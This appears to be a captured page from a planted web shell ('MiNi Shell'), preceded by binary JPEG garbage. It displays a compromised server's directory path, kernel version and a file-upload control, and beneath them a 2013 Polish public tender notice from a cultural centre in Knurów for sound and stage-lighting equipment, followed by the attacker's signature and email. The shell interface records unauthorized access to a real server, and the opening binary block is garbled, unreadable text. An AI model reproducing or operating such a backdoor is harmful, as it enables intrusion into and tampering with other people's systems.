JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/296172-N-2013.html

<p class="kh_header"><b>Knurów: ZAKUP SPRZĘTU NAGŁAŚNIAJĄCEGO I OŚWIETLENIA SCENICZNEGO DLA DOMU KULTURY W KNUROWIE-SZCZYGŁOWICACH 
PRZY UL. GÓRNICZEJ 1 W RAMACH PROJEKTU PN.  
NOWOCZESNY DOM KULTURY W KNUROWIE ODPOWIEDZIĄ NA KULTURALNE POTRZEBY MIESZKAŃCÓW REGIONU</b><br>
<b>Numer ogłoszenia: 296172 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Kultury , ul. Niepodległości 26, 44-190 Knurów, woj. śląskie, tel. 032 3303680, faks 032 3303681.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.centrum-kultury.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP SPRZĘTU NAGŁAŚNIAJĄCEGO I OŚWIETLENIA SCENICZNEGO DLA DOMU KULTURY W KNUROWIE-SZCZYGŁOWICACH 
PRZY UL. GÓRNICZEJ 1 W RAMACH PROJEKTU PN.  
NOWOCZESNY DOM KULTURY W KNUROWIE ODPOWIEDZIĄ NA KULTURALNE POTRZEBY MIESZKAŃCÓW REGIONU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Zakup sprzętu nagłaśniającego i oświetlenia scenicznego dla Domu Kultury w Knurowie-Szczygłowicach przy ul. Górniczej 1 w ramach projektu pn. Nowoczesny Dom Kultury w Knurowie odpowiedzią na kulturalne potrzeby mieszkańców regionu. 
2.Przedmiot zamówienia obejmuje dostawę sprzętu nagłaśniającego i oświetlenia scenicznego dla Domu Kultury w Knurowie - Szczygłowicach przy ul. Górniczej 1, według poniższego zestawienia:
1)Mikser + Stagebox + peryferia
a) mikser cyfrowy - 32 wejścia mikrofonowo-liniowe typu XLR; 14 pomocniczych szyn wyjściowych aux; 4 dedykowane szyny efektowe; 4 wyjścia matrycowe; wbudowane procesory efektów LEXICON; grupy wyciszenia (Mute); konsoleta przygotowana do obsługi Stageboxa po CAT5; bardzo niska latencja, brak zniekształceń; zmotoryzowane tłumiki 100 mm; ekran TFT 7calowy - 1 szt.
b) Stagebox cyfrowy 32 in 8 out Komunikacja CAT5 niska latencja, wbudowany zasilacz nie powodujący zakłóceń - 1 szt.
c)Notebook ,procesor Intel Core i5 o częstotliwości 2,5 GHz, RAM DDR3 4GB, Dysk SATA 500 GB, Grafika Intel HD 4000, System OS X Lion - 1 szt.
2)Kompletny zestaw nagłośnieniowy - Nagłośnienie estradowe aktywne: Moc zestawu to 2000W AES w sekcji niskotonowej oraz 5600W AES w sekcji wysoko-średniotonowej. Satelity mogą być ustawione na basie lub podwieszone; 8 x głośniki wysoko-średniotonowe- aktywny moduł szerokopasmowy Line Array- 2x10cali/2cale Pasmo 58-20000 Hz Max.SPL na poziomie min 134 dB;	2 x głośniki niskotonowe 2x18cali z 4calową cewką Pasmo min.32Hz-118Hz Integracja z systemami Line Array; Moduł do podwieszania    /2 kpl./. - 1 szt.
3)Korektor /driverack/ - Procesor: 2 in / 6 out; Zwrotnica sygnału; Kompresor; Limiter; System antysprzężeniowy; 28-pasmowy EQ; Automatyczna kalibracja; Wejście mikrofonu pomiarowego - 1 szt.
4)Monitor - Monitor sceniczny aktywny: Zakres 100Hz - 18KHz  +/- 3dB; Pasmo 72Hz - 20KHz; Max SPL 129 dB; Moc min. 600 W; Głośnik 12calowy/Driver 1calowy; Wzmacniacz w klasie D - 6 szt.
5) Odtwarzacz -CD/MP3: Kompatybilny z nośnikami CD-R, CD-RW, CD-R Digital Audio oraz CD-RW Digital Audio; Odtwarza pliki MP3 na płytach CD; Kontrola Pitch - 1 szt.
6) Multicore	 - Kabel wieloparowy: długość 50 mb, 32 wejścia, 8 powrotów - 1 szt.
7) Mikrofon	- Dynamiczny: Wyrównane, poszerzone pasmo przenoszenia; Jednorodna superkardioidalna charakterystyka kierunkowa; Pneumatyczne zawieszenie elastyczne; Pasmo przenoszenia: 50 do 16000 Hz; Waga ok.280g; Profesjonalny-estradowy - 6 szt.
8) Mikrofon - instrumentalny:	Dynamiczny, kardioidalny; Pasmo przenoszenia: 40 do 15000 Hz.; Waga ok. 280g; Profesjonalny-estradowy 6 szt.
9) Mikrofon - Instrumentalny perkusyjny:	charakterystyka kardioidalna; pasmo przenoszenia 40-18000Hz; impedancja 350Ohm; Waga nie więcej niż 125g; Profesjonalny-estradowy; Dla instrumentów perkusyjnych, dętych; Uchwyt do mocowania - 4 szt.
10) Okablowanie -Mikrofonowe sygnałowe itp.: Przewód mikrofonowy/ sygnałowy - 450 mb.; Złącze XLR żeńskie - 40 szt.; Złącze XLR męskie  - 40 szt.; Do zastosowań w pełni profesjonalnych
11) Sterownik DMX - Kontroler: Ilość kanałów DMX -  512; Wejście audio input; DMX 512 Out  -  3-pin XLR; Ilość programów  -  64; Wyświetlacz LCD; Regulacja parametrów PAN i TILT / 16bit - 1 szt.
12) Dimer DMX - Dystrybutor mocy: Maks. całkowita moc na kanał: 3680W; Wbudowane programy: 12; Zabezpieczenia typu C:12 x C16 A; DMX-output: 3-pin XLR ; DMX-input: 3-pin XLR ; Ilość kanałów: 12; Wyświetlacz LED; Możliwość rozgrzewania włókien - 2 szt.
13) Reflektor LED	- PAR 64:	Dimmer: 0-100%; Kontrola: 6-kanałów DMX; Protokół: USITT DMX 512; Zasilanie: 230V; 180 diód LED RGB 10mm; Kąt rozsyłu światła 23st 20 szt.
14) Efekt oświetleniowy	 - Ruchoma głowa	: Lampa - 300W fast fit, 8000K
balast elektroniczny (lub system LED); Cicha praca - poniżej 40dB z 1m; 8 dichronicznych filtrów; 2 tarcze gobo; do zastosowań profesjonalnych - 6 szt.
15) Efekt oświetleniowy - Stroboskop: Sterowanie w standardzie 512 DMX, lub dwa kanały muzyczne;	Jasność błysków regulowana od 0-100%; Częstotliwość błysków od 1 do 12 na sekundę; lampa w komplecie - 2 szt.
16) Efekt oświetleniowy	- Panel diodowy DMX: Standard DMX 512; diody wysokiej jakości; jasność LUX 1360 - 2 szt.
17) Kratownica -Trisystem: Kratownica trisystemu o długości 1.5m oraz rozpiętości 290mm. Odcinek prosty - 6 szt.
18) Okablowanie	- Sieciowe sterownicze DMX , itp.:	Przewód DMX - 530 mb.; Złącze XLR męskie -  45 szt.; Złącze XLR żeńskie - 45 szt.; Przewód zasilający - 200 szt.; Do zastosowań w pełni profesjonalnych.
3.Zamawiający w ramach zadania wymaga dostawy oryginalnego, fabrycznie nowego, nieużywanego, nieuszkodzonego i oryginalnie zapakowanego wyposażenia. Zgodnie z art. 30 ust 5 pzp na Wykonawcy leży obowiązek wykazania, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego.
4.Wykonawca zobowiązany jest dostarczyć Zamawiającemu w dniu odbioru przedmiotu umowy karty gwarancyjne, instrukcje obsługi, atesty, aprobaty techniczne - wszystko w języku polskim. 
5.Wykonawca na dostarczony przedmiot zamówienia udzieli minimalnej 36-miesięcznej gwarancji na całość przedmiotu zamówienia, lub dłuższej - jeżeli wynika to z gwarancji producenta dostarczonego urządzenia, oraz zobowiązuje się do zapewnienia pełnej funkcjonalności całości przedmiotu zamówienia poprzez bezpłatne usuwanie usterek w zakresie udzielonej przez siebie gwarancji. 
6.Termin gwarancji ulega przedłużeniu w przypadku zgłoszenia reklamacji, o okres zaczynający się datą zgłoszenia jej na piśmie, a kończący się dniem odbioru przez Zamawiającego przedmiotu wolnego od wad i usterek.
7.Maksymalny termin realizacji usług serwisowych wynosi 48 godzin przez okres 36 miesięcy. Przez termin realizacji usług serwisowych Zamawiający rozumie czas, w jakim Wykonawca jest zobowiązany usunąć zgłoszone usterki lub dostarczyć urządzenia zamienne.
8.Wykonawca jest zobowiązany do świadczenia przeglądu gwarancyjnego minimum dwa razy w roku w okresie gwarancji (w ramach zamówienia i w ramach wynagrodzenia ofertowego).
9.Wszystkie nazwy własne należy traktować jako te lub równoważne. Podane parametry techniczne urządzeń są parametrami minimalnymi. Dostarczone urządzenia nie mogą mieć parametrów gorszych niż opisane.
10.Zamówienie będzie współfinansowane do 27,75 % kosztów kwalifikowanych z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Program Rozwoju Subregionu Centralnego, Działanie 4.1 Infrastruktura kultury..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.34.24.00-6, 31.71.00.00-6, 31.53.00.00-0, 31.68.22.10-5, 31.00.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 01.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca przystępujący do przetargu winien wnieść wadium w wysokości 2.000,00 zł (słownie: dwa tysiące złotych). 
2.Wadium winno być wniesione przed upływem terminu składania ofert.
3.Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 pzp.
4.Wadium winno być ważne na cały okres związania ofertą.
5.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Centrum Kultury w Knurowie w Banku Polska Kasa Opieki S.A. konto nr 82 1240 4302 1111 0000 5267 6909.
6.Wadium wniesione w pieniądzu przechowywane jest na rachunku bankowym.
7.Wadium w pozostałych formach w oryginale należy złożyć w siedzibie Zamawiającego w sekretariacie, nie później niż do terminu składania ofert wyznaczonego w niniejszej SIWZ, i nie powinno ono stanowić załącznika do oferty - z uwagi na konieczność zwrotu dokumentu.
8.Wadium uważa się za wniesione w terminie:
8.1.z chwilą uznania rachunku bankowego zamawiającego przed upływem terminu do składania ofert - w pieniądzu,
8.2.z chwilą złożenia w siedzibie Zamawiającego przed upływem terminu składania ofert - w pozostałych formach.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>opis sposobu dokonywania oceny spełniania tego warunku - zamawiający wymaga wykazania w wykazie dostaw doświadczenia w wykonaniu co najmniej 2 dostaw obejmujących dostawę sprzętu nagłaśniającego i/lub oświetlenia scenicznego, o wartości nie mniejszej niż 130 tys. zł brutto, z udokumentowaniem, że została ona wykonana należycie, wykonanej w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i doświadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem - wystawionym w terminie określonym odpowiednio dla danego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.centrum-kultury.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Kultury, 44-190 Knurów ul. Niepodległości 26.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 11:00, miejsce: Centrum Kultury, 44-190 Knurów ul. Niepodległości 26, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane do 27,75 % kosztów kwalifikowanych z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013, Program Rozwoju Subregionu Centralnego, Działanie 4.1 Infrastruktura kultury..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com